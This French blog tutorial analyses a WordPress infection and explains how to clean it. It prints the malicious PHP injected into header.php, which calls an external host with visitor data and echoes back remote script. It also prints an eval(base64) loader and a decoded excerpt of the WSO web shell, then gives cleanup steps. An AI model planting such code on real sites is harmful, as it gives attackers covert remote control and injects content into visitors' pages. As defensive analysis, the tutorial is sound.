Ce tutoriel présente un cas particulier où un blog WordPress il était infecté. Suppression WordPress Virus PHP.
L'autre jour, j'ai remarqué un code suspect qui semble être un virus PHP pour WordPress. Le code PHP suivant était présent dans le header.php, avant la ligne </head>.
<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>Il s'agit d'un code PHP qui semble essayer de récupérer le contenu d'une ressource à partir d'un serveur externe, mais la partie qui fait référence à l'URL est incomplète.
Le mécanisme de travail est un peu plus complexe et fait cela WordPress Virus PHP invisible pour les visiteurs des sites concernés. Au lieu de cela, il cible les moteurs de recherche (Google) et entraîne implicitement une diminution significative du nombre de visiteurs sur les sites Web concernés.
Sommaire
Détails du malware WordPress PHP Virus
1. Le code ci-dessus est présent dans header.php.
2. Un fichier est apparu sur le serveur wp-log.php dans le dossier wp-includes.
3. wp-log.php contient un code crypté, mais qui est relativement facile à décrypter.
<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>Déchiffrer le code malveillant de wp-log.php :
<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("
<pre align=center-->
<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>Cela semble être un script PHP malveillant qui contient du code pour gérer l'authentification et les actions sur les fichiers et les répertoires sur un serveur. On voit très facilement que ce script contient des variables comme $auth_pass (mot de passe d'authentification), $default_action (l'action par défaut), $default_use_ajax (en utilisant Ajax par défaut) et $default_charset (paramètre de caractère par défaut).
De toute évidence, ce script comporte une section qui vérifie les agents utilisateurs HTTP pour bloquer l'accès à certains robots Web, tels que les moteurs de recherche. Il comporte également une section qui vérifie le mode de sécurité PHP et définit certains répertoires de travail.
4. Si wp-log.php est accessible dans le navigateur, une page Web apparaît avec un champ de authentification. À première vue, il semble s'agir d'un gestionnaire de fichiers grâce auquel de nouveaux fichiers peuvent être facilement téléchargés sur le serveur cible.
Comment déviruser un site Web WordPress?
Toujours, le processus de dé-virus manuel implique d'abord de découvrir et de comprendre quelle était la vulnérabilité.
1. Générez une sauvegarde pour l'ensemble du site Web. Cela doit inclure à la fois les fichiers et la base de données.
2. Déterminez approximativement depuis combien de temps le virus existe et recherchez sur le serveur Web les fichiers modifiés ou nouvellement créés dans le laps de temps approximatif.
Par exemple, si vous voulez voir les fichiers .php créé ou modifié la semaine dernière, exécutez la commande dans le serveur :
find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"C'est une méthode simple par laquelle vous pouvez découvrir les fichiers WordPress infectés et ceux contenant du code malveillant.
3. Vérifiez le fichier .htaccess de directives suspectes. Lignes d'autorisation ou exécution de script.
4. Vérifiez la base de données. Il est tout à fait possible que certains articles et pages WordPress être modifié avec des logiciels malveillants ou de nouveaux ajoutés utilisateurs ayant le rôle de administrator.
5. Vérifiez les autorisations d'écriture pour les dossiers et les fichiers. chmod şi chown.
Les permissions recommandées sont : 644 pour les fichiers et 755 pour les répertoires.
find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;6. Tout mettre à jour WordPress Plugins / WordPress Themes.
Connexe: Fix Redirect WordPress Hack 2023 (virus de redirection)
Ce sont des méthodes "de base" par lesquelles vous pouvez dévirus un site Web / blog WordPress. Si vous avez des problèmes et avez besoin d'aide, la section des commentaires est ouverte.
